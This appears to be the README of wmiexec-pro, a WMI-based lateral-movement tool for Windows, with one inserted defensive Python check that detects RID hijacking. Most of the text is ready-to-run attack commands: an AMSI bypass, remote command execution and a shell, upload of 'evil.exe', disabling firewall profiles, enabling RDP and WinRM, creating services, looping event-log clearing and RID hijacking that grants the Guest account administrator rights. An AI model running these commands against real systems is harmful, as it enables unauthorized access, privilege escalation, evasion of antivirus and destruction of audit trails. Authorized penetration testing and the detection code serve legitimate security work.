Project introduction
A new generation of wmiexec.py with more features. The whole operation works only over port 135 (no SMB connection is needed), for AV evasion (Windows Defender, Huorong (火绒), 360) during lateral movement.
Project features
Usage
python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h
Basic enumeration:
python3 wmiexec-pro.py administrator:password@192.168.1.1 enum -run
Enable/disable amsi bypass:
python3 wmiexec-pro.py administrator:password@192.168.1.1 amsi -enable
python3 wmiexec-pro.py administrator:password@192.168.1.1 amsi -disable
Execute command:
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -shell (Launch a semi-interactive shell)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" (Default is with output mode)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent (Silent mode)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent -old (Silent mode on old OS versions, such as Server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old (With output in old version OS, such as server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -save (With output and save output to file)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old -save
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -clear (Remove temporary class for command result storage)
File transfer:
python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -upload -src-file "./evil.exe" -dest-file "C:\windows\temp\evil.exe" (Upload file over 512KB)
python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -download -src-file "C:\windows\temp\evil.exe" -dest-file "/tmp/evil.exe" (Download file over 512KB)
python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -clear (Remove temporary class for file transfer)
RDP:
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable (Auto configure firewall)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable -old (For old version OS, such as server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable-ram (Enable Restricted Admin Mode for PTH; old OS versions such as Server 2003 are not supported)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable -old (For old OS versions, such as Server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable-ram (Disable Restricted Admin Mode)
WinRM (Only support win7+):
python3 wmiexec-pro.py administrator:password@192.168.1.1 winrm -enable
python3 wmiexec-pro.py administrator:password@192.168.1.1 winrm -disable
Firewall (Only support win8+):
python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -search-port 445
python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -dump (Dump all firewall rules)
python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -rule-id (ID from search port) -action [enable/disable/remove] (enable, disable, remove specify rule)
python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile enable (Enable all firewall profiles)
python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile disable (Disable all firewall profiles)
Services:
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe'
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe' -class "Win32_TerminalService" (Create service via alternative class)
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action start -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action stop -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action disable -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action auto-start -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action manual-start -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action getinfo -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action delete -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -dump all-services.json
Eventlog:
python3 wmiexec-pro.py administrator:password@192.168.1.1 eventlog -risk-i-know (Clear the event log in a loop)
python3 wmiexec-pro.py administrator:password@192.168.1.1 eventlog -retrive object-ID (Stop the event log clearing loop)
RID Hijack:
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant (Grant access permissions for SAM/SAM subkey in registry)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant-old (For old version OS, such as server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action activate (Activate user)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action deactivate (Deactivate user)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action hijack -user 501 -hijack-rid 500 (Hijack guest user rid 501 to administrator rid 500)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login enable (Enable blank password login)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login disable
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 500 -action backup (This will save user profile data as json file)
python3 wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -user 500 -remove (Use the guest user to remove the administrator user profile after the RID hijack)
python3 wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -restore "backup.json" (Restore user profile for target user)
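A defender-side check for the RID hijack this section performs, added here as an example and not part of wmiexec-pro: given the SAM Users subkeys and their F values (e.g. from an offline hive export), it flags any account whose embedded RID differs from the RID its key is named after, such as the Guest key (0x1F5) rewritten to RID 500. The F offsets follow the documented SAM layout; the sample hive data is constructed inline.

```python
import struct

# SAM "F" value layout (HKLM\SAM\SAM\Domains\Account\Users\<hexRID>), as documented
# for the RID hijacking technique: account RID is a little-endian DWORD at 0x30,
# account-control (ACB) flags are a WORD at 0x38 (bit 0x0001 = disabled).
RID_OFFSET = 0x30
ACB_OFFSET = 0x38
ACB_DISABLED = 0x0001

def stored_rid(f_value: bytes) -> int:
    """RID recorded inside the F blob, which is what the logon path uses."""
    if len(f_value) < ACB_OFFSET + 2:
        raise ValueError("F value too short to be an account record")
    return struct.unpack_from("<I", f_value, RID_OFFSET)[0]

def account_enabled(f_value: bytes) -> bool:
    return not (struct.unpack_from("<H", f_value, ACB_OFFSET)[0] & ACB_DISABLED)

def find_rid_mismatches(users: dict) -> list:
    """users maps each Users subkey name (hex RID) to its F value.
    A subkey whose embedded RID differs from the RID it is named after has been
    tampered with; if it is also enabled (Guest key 0x1F5 carrying RID 500) the
    hijack is live. Returns (subkey, key_rid, stored_rid, enabled) tuples."""
    findings = []
    for subkey, f_value in users.items():
        key_rid = int(subkey, 16)
        rid = stored_rid(f_value)
        if rid != key_rid:
            findings.append((subkey, key_rid, rid, account_enabled(f_value)))
    return findings

def make_f(rid: int, disabled: bool) -> bytes:
    """Constructed sample F blob; only the two fields checked above are filled."""
    f = bytearray(0x50)
    struct.pack_into("<I", f, RID_OFFSET, rid)
    struct.pack_into("<H", f, ACB_OFFSET, 0x0010 | (ACB_DISABLED if disabled else 0))
    return bytes(f)

# Constructed snapshot: Administrator intact, Guest key (0x1F5) rewritten to carry
# RID 500 and enabled (the hijack this README performs), local user 0x3E9 untouched.
SAMPLE_USERS = {
    "000001F4": make_f(500, disabled=False),
    "000001F5": make_f(500, disabled=False),
    "000003E9": make_f(1001, disabled=True),
}

if __name__ == "__main__":
    for subkey, key_rid, rid, enabled in find_rid_mismatches(SAMPLE_USERS):
        print(f"{subkey}: named RID {key_rid} but F holds RID {rid}, enabled={enabled}")
```

Running the same check after a `-restore` should return an empty list; a Guest key that still reports RID 500 means the restore did not take.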
Help information:
Command execution:
File transfer:
How it works
Disclaimer
For technical research and formally authorized offensive/defensive engagements only. Users must comply with the Cybersecurity Law of the People's Republic of China and must not use this tool for any illegal activity. If the tool is used for any other purpose, the user bears all legal and joint liability; the author and publisher assume no legal liability whatsoever.